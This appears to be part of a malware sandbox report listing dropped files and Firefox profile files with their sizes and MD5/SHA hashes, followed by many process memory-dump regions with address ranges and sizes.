
SHA256
17dfcf78dca415e3e7afac7519db911c0a93f36388c948aba40bcaa3176589a1

SHA512
465394c349dc74fd8a5c5ce5a89d65f0b0e09432d54517ea12de2bc8ccb329629dde03b0939800d30d008bedf0dca948fd84593bab7b7c8994ba041a7af1af2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{999e0227-138a-49b0-a923-8d840a228077}\storage.dll

Filesize
301KB

MD5
d470615822aa5c5f7078b743a676f152

SHA1
f069bfff46cf0e08b2d615d5a9a289b7c9a6b85c

SHA256
f77657ee84fd1790d0a765ed45a1c832fbeb340cce8ce9011544295c70c1b1dc

SHA512
8826f0924d4444cbe60ec5b24d89f36f6619308b4058e4790e0228614226516eb312dcceb1a3ffe8c0bee8f545efbcffe1188cbf17b9f1c7fb58dad6090be1f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\{999e0227-138a-49b0-a923-8d840a228077}\storage.kvdb

Filesize
6KB

MD5
1a3330c4f388360e4c2b0d94fb48a788

SHA1
127ad9be38c4aa491bd1bce6458f99a27c6d465b

SHA256
01b8d0d8c7114b59f159021384c8a59535f87018a6a136a276b5a297f54d776d

SHA512
1fcd1e99e35dc4ec972ab63299637322a27b471d02175d56409a3a114db6259f9cd767ac054c7a2bba075f36ab62f19c8118c3dda93e37b7deda05aa2b260553

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\AlternateServices.bin

Filesize
12KB

MD5
b778eca42501ee93acd97c7487c0ac96

SHA1
52a6ec8e6c5e81a0db5d61492bd7c1d5bb541062

SHA256
5787222d5255bec558cb52f368f6a0bfa26858c9e78af0b2219825e2ea58d4f3

SHA512
ddc6af52591a124421de348c5d09dcca4782340c1c14bd3aa45dc24f7c38df89bf58764f6e9b4a25ce1e955f07f45f6575a7aec7788a39f3334617a3db6f011c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\SiteSecurityServiceState.bin

Filesize
1KB

MD5
b163c91ac736140e05631046e02b6cb1

SHA1
11c35e9c951ff81a0efc15f3311d9889edf80fc9

SHA256
58b3cd1b9c7fc11a57e18c53d826e902e056398e419d47ca685c58cbeb2e19ef

SHA512
912f3019615196fdb9476b567db3cdc345810ec1b7860a01e1e9f751e6e4dd4b889e204d453a8b3bc1563528d461f1a384bb3a7159dc8d5699a9e6eba7b5afef

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\events\events

Filesize
1KB

MD5
ee477530eadd41f31a27ed87303eab87

SHA1
1268480d3379fedb878ec72433bf46dfa6544d82

SHA256
0733f8613af06e3b89796086055c30e937cfdf0adb43bfbbdbbc57add6007882

SHA512
74260305760e010272f0d09094ceeb3296cd0696d3d97c3fd484723222f339c96f9956a5342d53c67b44faeb52cb775265c25fb005842f21b246187f058d70b4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\136b6b85-7e54-4e2d-846f-3fc1924549a6

Filesize
2KB

MD5
82311546f42e4c8ffd91c8849d043a71

SHA1
bc1dc249e4ab25256e649b8b55807e86bd34688c

SHA256
2123e9a53e84e324727c93871653e8a4f079043a105a60328fb0dac44497895c

SHA512
86eafcc60e99526f8cffd01702e08b0e6beef03cdead14c6122fed20104f8ee6d9bfa746e4c18dbc6c93480661be69a99ad763aa30d0625f38893640c54dd516

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\49cfc0ca-57db-46ec-82d5-767fab5a15d3

Filesize
883B

MD5
90cf47bc3967e121c7750546a68a405d

SHA1
2e7004d846dc60d650490c734d3e040851549b73

SHA256
5a3f74cb1613068fe911269ec04133d9a57f8d92e7d76a89518a495eb98cedbb

SHA512
3a65b260d8eb0d4ca46104d4d3b16a59d306c7f48b1fbcc7d851c3f06ce67c18e967c08bdcb244a09bedb32a039ccb3fb54e07bf4ee1f7387dcce688690398fc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\6e85350e-4b9d-4159-b4b7-15b225cd0f18

Filesize
235B

MD5
2b2771145f38a44cae4413c901ccbb7c

SHA1
220ea4a4f792d3d2eef7d9d6a47d65104df66512

SHA256
62d106ff6ddc3dd0340d824491bc93a8babe2c47ecef312f9509a90331cd39f3

SHA512
19b51e0444aa1f85e29d3781dd6dea53931c35a3db7b9d073cb0d570477bc7e57f076167b890b75ff1b2dd5bfa2f6b7c6092ef52431564405da1413ca658bf41

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\720a8f8d-e875-4323-9aa3-ca7b7daf9eea

Filesize
886B

MD5
6e6548a37e59d6159562b91914f1f8d0

SHA1
2fa11b4194db610cb9d49f23ff90dac49a10c06f

SHA256
c730052ca28a49e1215a7cae6cfa8a1e9dd45d485f1c25ed66d0f0497556e056

SHA512
2a4aeed12ec0f855f7759fa6e3c274ee76cec41d8a6d438b33c245ee4b4b49d8c2f5ccf4c01a64486415fc23a1b2515428ea25f2673aa5d383eb21400b547a33

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\8806b31f-3aac-41e3-b98a-4cb347f79470

Filesize
16KB

MD5
f10dbd4431e44151d38f2a3e6df0dddb

SHA1
96442e3b3b9c6b3e439c5caaad8c74f2e193b4d9

SHA256
28063e8a0b9ab1a302edc278b7b75280c4172acacafc1d7eb32efacc8da0e25a

SHA512
7f0ea5fa24831f44f6bc829693d064cad1109097ffc2a7a4b9af3a2436fccb3718da6bf864708cfbd4840b11ef84aeda2bd5f4240ae09565ac551ebf1898d77e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\datareporting\glean\pending_pings\a943f15a-b2ab-4bd2-b81c-3b4ca0b4d945

Filesize
235B

MD5
cc210e7b530f07878bc37253519522b3

SHA1
425c199fd6ba900edf5edd757460618e782e0a46

SHA256
88c9769eaed1cb0a472780c5c03304d893b3aa97d204527b9c6bed06c0e25b46

SHA512
1847040958d68efb7cb87f3ece1d6c4e239526c33bc6e0fc6e675e97c20d3bd54fd349d3ccdd41dfb9f1bd7b09504b39df5673584a09dd667f45e110ae02705b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zr0euw58.default-release\prefs-1.js

Filesize
6KB

MD5
c549b2c8c5b02467f0155b1d6147e26d

SHA1
4618244207fb08fa5d47d87c92cc2604cf9a68f8

SHA256
3ed74a3ef8811ca54a95654c2e402f32765cb1b351f8ab9588548d0d9fb92580

SHA512
b8358a890de53fcdcfe8212f4f1d99ce97555deff54892bdac5b6ca8730e0caeee55db08c3ee60e01cb66f3a22b5f15064a158ba1406eeb7e6058ae4e238d5e7

Download Submit
memory/492-49-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/492-50-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/788-6922-0x0000000000F90000-0x0000000001433000-memory.dmp

Filesize
4.6MB

Download
memory/788-6924-0x0000000000F90000-0x0000000001433000-memory.dmp

Filesize
4.6MB

Download
memory/1112-161-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-154-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-156-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-160-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-153-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-159-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-152-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-157-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-158-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-151-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-149-0x0000000140000000-0x000000014043E000-memory.dmp

Filesize
4.2MB

Download
memory/1112-155-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-163-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1112-162-0x0000000000900000-0x0000000000A88000-memory.dmp

Filesize
1.5MB

Download
memory/1224-109-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1224-118-0x0000000076EC0000-0x0000000077112000-memory.dmp

Filesize
2.3MB

Download
memory/1224-115-0x0000000002F80000-0x0000000003380000-memory.dmp

Filesize
4.0MB

Download
memory/1224-114-0x0000000002F80000-0x0000000003380000-memory.dmp

Filesize
4.0MB

Download
memory/1224-112-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1224-110-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1224-116-0x00007FFE97320000-0x00007FFE97529000-memory.dmp

Filesize
2.0MB

Download
memory/1328-83-0x0000020330DA0000-0x0000020330E11000-memory.dmp

Filesize
452KB

Download
memory/1328-73-0x0000000000180000-0x0000000000182000-memory.dmp

Filesize
8KB

Download
memory/1328-81-0x0000020330DA0000-0x0000020330E11000-memory.dmp

Filesize
452KB

Download
memory/1328-82-0x0000020330DA0000-0x0000020330E11000-memory.dmp

Filesize
452KB

Download
memory/1328-113-0x0000020330DA0000-0x0000020330E11000-memory.dmp

Filesize
452KB

Download
memory/1328-74-0x0000020330DA0000-0x0000020330E11000-memory.dmp

Filesize
452KB

Download
memory/2176-6842-0x00000000005F0000-0x0000000000A7E000-memory.dmp

Filesize
4.6MB

Download
memory/2176-139-0x00000000005F0000-0x0000000000A7E000-memory.dmp

Filesize
4.6MB

Download
memory/2240-51-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/2240-52-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/2240-29-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/2240-125-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/2620-15-0x0000000000E50000-0x00000000012E7000-memory.dmp

Filesize
4.6MB

Download
memory/2620-28-0x0000000000E50000-0x00000000012E7000-memory.dmp

Filesize
4.6MB

Download
memory/2748-17288-0x0000000005190000-0x000000000522C000-memory.dmp

Filesize
624KB

Download
memory/2748-17287-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/2772-121-0x0000000001720000-0x0000000001B20000-memory.dmp

Filesize
4.0MB

Download
memory/2772-122-0x00007FFE97320000-0x00007FFE97529000-memory.dmp

Filesize
2.0MB

Download
memory/2772-124-0x0000000076EC0000-0x0000000077112000-memory.dmp

Filesize
2.3MB

Download
memory/2772-119-0x00000000010A0000-0x00000000010AA000-memory.dmp

Filesize
40KB

Download
memory/2860-92-0x0000020DA0310000-0x0000020DA0332000-memory.dmp

Filesize
136KB

Download
memory/4088-17070-0x0000000000400000-0x0000000000CC4000-memory.dmp

Filesize
8.8MB

Download
memory/4088-17025-0x0000000000400000-0x0000000000CC4000-memory.dmp

Filesize
8.8MB

Download
memory/4384-33-0x00000000001C0000-0x000000000066E000-memory.dmp

Filesize
4.7MB

Download
memory/4384-34-0x00000000001C0000-0x000000000066E000-memory.dmp

Filesize
4.7MB

Download
memory/4988-17659-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/4988-17657-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/5160-70-0x0000000000400000-0x0000000000681000-memory.dmp

Filesize
2.5MB

Download
memory/7152-6903-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/7152-6905-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/9076-16265-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/9076-16296-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/9348-7484-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/9348-7467-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/9368-7111-0x00000000009A0000-0x00000000010AE000-memory.dmp

Filesize
7.1MB

Download
memory/9368-7104-0x00000000009A0000-0x00000000010AE000-memory.dmp

Filesize
7.1MB

Download
memory/9500-10289-0x0000026BC05C0000-0x0000026BC0614000-memory.dmp

Filesize
336KB

Download
memory/9500-7486-0x0000026BC0650000-0x0000026BC075A000-memory.dmp

Filesize
1.0MB

Download
memory/9500-10281-0x0000026BC0550000-0x0000026BC059C000-memory.dmp

Filesize
304KB

Download
memory/9500-10280-0x0000026BA64D0000-0x0000026BA6526000-memory.dmp

Filesize
344KB

Download
memory/9500-7485-0x0000026BA6000000-0x0000026BA60A8000-memory.dmp

Filesize
672KB

Download
memory/10644-10373-0x0000000002700000-0x0000000002708000-memory.dmp

Filesize
32KB

Download
memory/10644-10370-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

Filesize
136KB

Download
memory/10644-10366-0x0000000005C70000-0x0000000005CBC000-memory.dmp

Filesize
304KB

Download
memory/10644-10588-0x000000000C3A0000-0x000000000C4F4000-memory.dmp

Filesize
1.3MB

Download
memory/10644-10367-0x0000000007510000-0x0000000007B8A000-memory.dmp

Filesize
6.5MB

Download
memory/10644-10364-0x0000000005750000-0x0000000005AA7000-memory.dmp

Filesize
3.3MB

Download
memory/10644-10589-0x0000000004B50000-0x0000000004B6A000-memory.dmp

Filesize
104KB

Download
memory/10644-10355-0x0000000005670000-0x00000000056D6000-memory.dmp

Filesize
408KB

Download
memory/10644-10592-0x000000000C620000-0x000000000C62A000-memory.dmp

Filesize
40KB

Download
memory/10644-17439-0x0000000004EA0000-0x0000000004EDC000-memory.dmp

Filesize
240KB

Download
memory/10644-17438-0x0000000000810000-0x0000000000822000-memory.dmp

Filesize
72KB

Download
memory/10644-10354-0x0000000005600000-0x0000000005666000-memory.dmp

Filesize
408KB

Download
memory/10644-10663-0x000000000C7A0000-0x000000000C7F0000-memory.dmp

Filesize
320KB

Download
memory/10644-10664-0x000000000C8B0000-0x000000000C962000-memory.dmp

Filesize
712KB

Download
memory/10644-10672-0x000000000CB40000-0x000000000CD02000-memory.dmp

Filesize
1.8MB

Download
memory/10644-10353-0x0000000004E30000-0x0000000004E52000-memory.dmp

Filesize
136KB

Download
memory/10644-10687-0x000000000CDD0000-0x000000000CE1E000-memory.dmp

Filesize
312KB

Download
memory/10644-10352-0x0000000004EE0000-0x000000000550A000-memory.dmp

Filesize
6.2MB

Download
memory/10644-10351-0x0000000004870000-0x00000000048A6000-memory.dmp

Filesize
216KB

Download
memory/10644-10368-0x0000000006CB0000-0x0000000006CCA000-memory.dmp

Filesize
104KB

Download
memory/10644-10369-0x0000000006E90000-0x0000000006F26000-memory.dmp

Filesize
600KB

Download
memory/10644-10365-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/10644-10371-0x0000000007B90000-0x0000000008136000-memory.dmp

Filesize
5.6MB

Download
memory/10644-10372-0x0000000007010000-0x00000000070A2000-memory.dmp

Filesize
584KB

Download
memory/10644-10383-0x0000000007270000-0x0000000007368000-memory.dmp

Filesize
992KB

Download
memory/11140-17398-0x0000000000400000-0x0000000000E98000-memory.dmp

Filesize
10.6MB

Download
memory/11140-17319-0x0000000000400000-0x0000000000E98000-memory.dmp

Filesize
10.6MB

Download
memory/11780-10525-0x0000000007250000-0x0000000007265000-memory.dmp

Filesize
84KB

Download
memory/11780-10425-0x0000000006EA0000-0x0000000006EBE000-memory.dmp

Filesize
120KB

Download
memory/11780-10428-0x0000000006ED0000-0x0000000006F74000-memory.dmp

Filesize
656KB

Download
memory/11780-10447-0x0000000007080000-0x000000000708A000-memory.dmp

Filesize
40KB

Download
memory/11780-10475-0x0000000007210000-0x0000000007221000-memory.dmp

Filesize
68KB

Download
memory/11780-10514-0x0000000007240000-0x000000000724E000-memory.dmp

Filesize
56KB

Download
memory/11780-10530-0x0000000007350000-0x000000000736A000-memory.dmp

Filesize
104KB

Download
memory/11780-10563-0x0000000007340000-0x0000000007348000-memory.dmp

Filesize
32KB

Download
memory/11780-10413-0x0000000006E60000-0x0000000006E94000-memory.dmp

Filesize
208KB

Download
memory/11780-10415-0x000000006EB70000-0x000000006EBBC000-memory.dmp

Filesize
304KB

Download
memory/15060-6861-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/15060-6859-0x0000000000750000-0x0000000000BE7000-memory.dmp

Filesize
4.6MB

Download
memory/24520-17464-0x00007FF656AA0000-0x00007FF657121000-memory.dmp

Filesize
6.5MB

Download
memory/24520-17470-0x00007FF656AA0000-0x00007FF657121000-memory.dmp

Filesize
6.5MB

Download
memory/24536-17508-0x0000000000550000-0x00000000009FE000-memory.dmp

Filesize
4.7MB

Download
memory/24536-17428-0x0000000000550000-0x00000000009FE000-memory.dmp

Filesize
4.7MB

Download
memory/24536-17466-0x0000000000550000-0x00000000009FE000-memory.dmp

Filesize
4.7MB

Download